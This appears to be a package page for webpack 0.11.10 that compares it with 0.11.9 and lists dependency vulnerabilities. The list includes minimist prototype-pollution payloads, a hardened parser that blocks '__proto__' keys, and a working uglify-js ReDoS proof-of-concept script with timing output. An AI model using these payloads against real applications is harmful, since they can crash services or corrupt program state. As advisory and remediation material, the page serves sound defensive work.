Webpack version 0.11.10 is a minor update to the module bundler, released on December 3rd, 2013, shortly after version 0.11.9 which came out on November 27th, 2013. Both versions offer the same core functionality: packing CommonJs, AMD, and Labeled Modules for browser deployment and code splitting for on-demand loading. They also maintain identical development dependencies. This includes testing frameworks like Mocha and Should, web servers like Express, and a suite of loaders crucial for processing various file types such as CSS, JSON, Jade (now Pug), LESS, CoffeeScript, and more. The loaders supported allow developers to seamlessly integrate different asset types into their JavaScript applications, streamlining the build process.
The dependency lists for the two versions are identical. Based on the data available, developers already using webpack in November/December 2013 would not necessarily gain any new features or bug fixes by upgrading from 0.11.9 to 0.11.10. For developers new to webpack at that time, either version offered a robust and flexible solution for managing complex JavaScript projects, supporting modular development and optimized asset delivery within web applications, so either was a good choice for getting started. The library allows files to be preprocessed via a wide array of loaders.
Vulnerabilities related to version 0.11.10 of the package:
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises an uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
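As an added illustration for both minimist advisories above (this is not code from minimist, webpack, or the advisories), the following hardened dotted-key argument parser shows the defensive check that closes the path they describe: key segments such as __proto__, constructor and prototype are refused before anything is written, nested containers are created without a prototype, and the parser reports which arguments it rejected so they can be logged. The function names (isDangerousKey, setKeySafe, parseArgs, prototypeIsClean) and the sample argv are constructed for this example.

```javascript
'use strict';

// Key-path segments that can redirect a write onto a shared prototype
// when a parser walks them naively.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// True when a dotted key path (e.g. "__proto__.y") contains a segment
// that could reach Object.prototype.
function isDangerousKey(key) {
  return key.split('.').some((segment) => FORBIDDEN_SEGMENTS.has(segment));
}

// Write `value` at the dotted path `key` on `target`. Refuses dangerous
// segments and only descends into own, plain-object properties, so the
// walk can never drift into inherited state.
function setKeySafe(target, key, value) {
  if (isDangerousKey(key)) {
    throw new Error('refusing to set key "' + key + '"');
  }
  const segments = key.split('.');
  let node = target;
  for (let i = 0; i < segments.length - 1; i++) {
    const segment = segments[i];
    const existing = Object.prototype.hasOwnProperty.call(node, segment)
      ? node[segment]
      : undefined;
    if (existing === null || typeof existing !== 'object') {
      // Prototype-less container: even a later bug cannot make it
      // inherit from (or write through to) Object.prototype.
      node[segment] = Object.create(null);
    }
    node = node[segment];
  }
  node[segments[segments.length - 1]] = value;
}

// Parse "--key=value" / "--key" arguments into a nested object. Arguments
// whose key path is dangerous are collected in `rejected` instead of
// being applied, so callers can log them as a detection signal.
function parseArgs(argv) {
  const result = Object.create(null);
  const rejected = [];
  for (const arg of argv) {
    const match = /^--([^=]+)(?:=([\s\S]*))?$/.exec(arg);
    if (!match) continue; // positional arguments are out of scope here
    const key = match[1];
    const value = match[2] === undefined ? true : match[2];
    if (isDangerousKey(key)) {
      rejected.push(arg);
      continue;
    }
    setKeySafe(result, key, value);
  }
  return { result: result, rejected: rejected };
}

// Post-parse integrity check: a fresh object must not have picked up the
// named property from the parsed input.
function prototypeIsClean(propertyName) {
  return !(propertyName in {});
}

// Constructed sample, mirroring the payloads quoted in the advisory.
const sampleArgv = ['--__proto__.y=Polluted', '--a.b=1', '--__proto__=Polluted', '--verbose'];
const parsedSample = parseArgs(sampleArgv);
console.log(JSON.stringify(parsedSample));
console.log('Object.prototype clean:', prototypeIsClean('y'));
```

Run with node; the two __proto__ arguments land in `rejected`, `--a.b=1` and `--verbose` are applied, and `prototypeIsClean('y')` stays true. Logging the `rejected` list from a CLI or a service that accepts user-supplied arguments gives a cheap indicator that someone is probing for this class of bug.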
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
// Build a string of `len` repetitions of `chr` (the <= keeps the original
// proof of concept's count of len + 1 characters).
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) { // `var i` added: the original leaked i as a global
    result = result + chr;
  }
  return result;
};
// The length comes from the command line; the long digit run ending in a
// malformed exponent is the input that triggers the regular expression
// denial of service in parse(), so parse time grows with the input size.
u.parse("var a = " + genstr(parseInt(process.argv[2], 10), "1") + ".1ee7;");
Running the script as test.js with increasing lengths:
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.